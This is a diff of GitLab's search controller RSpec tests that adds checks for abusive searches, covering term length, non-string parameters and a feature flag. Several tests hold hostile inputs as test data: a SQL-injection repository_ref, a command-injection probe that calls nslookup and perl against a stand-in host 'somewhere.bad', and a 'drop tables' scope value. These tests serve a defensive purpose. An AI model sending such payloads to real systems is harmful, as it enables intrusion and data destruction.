diff options
Diffstat (limited to 'spec/controllers/search_controller_spec.rb')
-rw-r--r-- | spec/controllers/search_controller_spec.rb | 109 |
1 files changed, 87 insertions, 22 deletions
diff --git a/spec/controllers/search_controller_spec.rb b/spec/controllers/search_controller_spec.rb index 73e8e0c7dd4..a54f16ec237 100644 --- a/spec/controllers/search_controller_spec.rb +++ b/spec/controllers/search_controller_spec.rb @@ -127,21 +127,26 @@ RSpec.describe SearchController do context 'check search term length' do let(:search_queries) do - char_limit = SearchService::SEARCH_CHAR_LIMIT - term_limit = SearchService::SEARCH_TERM_LIMIT + char_limit = Gitlab::Search::Params::SEARCH_CHAR_LIMIT + term_limit = Gitlab::Search::Params::SEARCH_TERM_LIMIT + term_char_limit = Gitlab::Search::AbuseDetection::ABUSIVE_TERM_SIZE { - chars_under_limit: ('a' * (char_limit - 1)), - chars_over_limit: ('a' * (char_limit + 1)), - terms_under_limit: ('abc ' * (term_limit - 1)), - terms_over_limit: ('abc ' * (term_limit + 1)) + chars_under_limit: (('a' * (term_char_limit - 1) + ' ') * (term_limit - 1))[0, char_limit], + chars_over_limit: (('a' * (term_char_limit - 1) + ' ') * (term_limit - 1))[0, char_limit + 1], + terms_under_limit: ('abc ' * (term_limit - 1)), + terms_over_limit: ('abc ' * (term_limit + 1)), + term_length_over_limit: ('a' * (term_char_limit + 1)), + term_length_under_limit: ('a' * (term_char_limit - 1)) } end where(:string_name, :expectation) do - :chars_under_limit | :not_to_set_flash - :chars_over_limit | :set_chars_flash - :terms_under_limit | :not_to_set_flash - :terms_over_limit | :set_terms_flash + :chars_under_limit | :not_to_set_flash + :chars_over_limit | :set_chars_flash + :terms_under_limit | :not_to_set_flash + :terms_over_limit | :set_terms_flash + :term_length_under_limit | :not_to_set_flash + :term_length_over_limit | :not_to_set_flash # abuse, so do nothing. end with_them do @@ -172,6 +177,12 @@ RSpec.describe SearchController do expect(response).to redirect_to new_user_session_path end + + it 'redirects to login page when trying to circumvent the restriction' do + get :show, params: { scope: 'projects', project_id: non_existing_record_id, search: '*' } + + expect(response).to redirect_to new_user_session_path + end end context 'for authenticated user' do @@ -181,6 +192,14 @@ RSpec.describe SearchController do expect(response).to have_gitlab_http_status(:ok) end end + + context 'handling abusive search_terms' do + it 'succeeds but does NOT do anything' do + get :show, params: { scope: 'projects', search: '*', repository_ref: '-1%20OR%203%2B640-640-1=0%2B0%2B0%2B1' } + expect(response).to have_gitlab_http_status(:ok) + expect(assigns(:search_results)).to be_a Gitlab::EmptySearchResults + end + end end context 'tab feature flags' do @@ -215,16 +234,6 @@ RSpec.describe SearchController do end end - it 'strips surrounding whitespace from search query' do - get :show, params: { scope: 'notes', search: ' foobar ' } - expect(assigns[:search_term]).to eq 'foobar' - end - - it 'strips surrounding whitespace from autocomplete term' do - expect(controller).to receive(:search_autocomplete_opts).with('youcompleteme') - get :autocomplete, params: { term: ' youcompleteme ' } - end - it 'finds issue comments' do project = create(:project, :public) note = create(:note_on_issue, project: project) @@ -283,7 +292,7 @@ RSpec.describe SearchController do end end - describe 'GET #count' do + describe 'GET #count', :aggregate_failures do it_behaves_like 'when the user cannot read cross project', :count, { search: 'hello', scope: 'projects' } it_behaves_like 'with external authorization service enabled', :count, { search: 'hello', scope: 'projects' } it_behaves_like 'support for active record query timeouts', :count, { search: 'hello', scope: 'projects' }, :search_results, :json @@ -315,13 +324,40 @@ RSpec.describe SearchController do expect(response).to have_gitlab_http_status(:ok) - expect(response.headers['Cache-Control']).to eq('private, no-store') + expect(response.headers['Cache-Control']).to eq('max-age=60, private') + end + + it 'does NOT blow up if search param is NOT a string' do + get :count, params: { search: ['hello'], scope: 'projects' } + expect(response).to have_gitlab_http_status(:ok) + expect(json_response).to eq({ 'count' => '0' }) + + get :count, params: { search: { nested: 'hello' }, scope: 'projects' } + expect(response).to have_gitlab_http_status(:ok) + expect(json_response).to eq({ 'count' => '0' }) + end + + it 'does NOT blow up if repository_ref contains abusive characters' do + get :count, params: { + search: 'hello', + repository_ref: "(nslookup%20hitqlwv501f.somewhere.bad%7C%7Cperl%20-e%20%22gethostbyname('hitqlwv501f.somewhere.bad')%22)", + scope: 'projects' + } + expect(response).to have_gitlab_http_status(:ok) + expect(json_response).to eq({ 'count' => '0' }) end end describe 'GET #autocomplete' do it_behaves_like 'when the user cannot read cross project', :autocomplete, { term: 'hello' } it_behaves_like 'with external authorization service enabled', :autocomplete, { term: 'hello' } + it_behaves_like 'support for active record query timeouts', :autocomplete, { term: 'hello' }, :project, :json + + it 'returns an empty array when given abusive search term' do + get :autocomplete, params: { term: ('hal' * 9000), scope: 'projects' } + expect(response).to have_gitlab_http_status(:ok) + expect(json_response).to match_array([]) + end end describe '#append_info_to_payload' do @@ -351,6 +387,35 @@ RSpec.describe SearchController do get :show, params: { search: 'hello world', group_id: '123', project_id: '456' } end end + + context 'abusive searches', :aggregate_failures do + let(:project) { create(:project, :public, name: 'hello world') } + let(:make_abusive_request) do + get :show, params: { scope: '1;drop%20tables;boom', search: 'hello world', project_id: project.id } + end + + before do + enable_external_authorization_service_check + end + + it 'returns EmptySearchResults' do + expect(Gitlab::EmptySearchResults).to receive(:new).and_call_original + make_abusive_request + expect(response).to have_gitlab_http_status(:ok) + end + + context 'when the feature flag is disabled' do + before do + stub_feature_flags(prevent_abusive_searches: false) + end + + it 'returns a regular search result' do + expect(Gitlab::EmptySearchResults).not_to receive(:new) + make_abusive_request + expect(response).to have_gitlab_http_status(:ok) + end + end + end end context 'unauthorized user' do |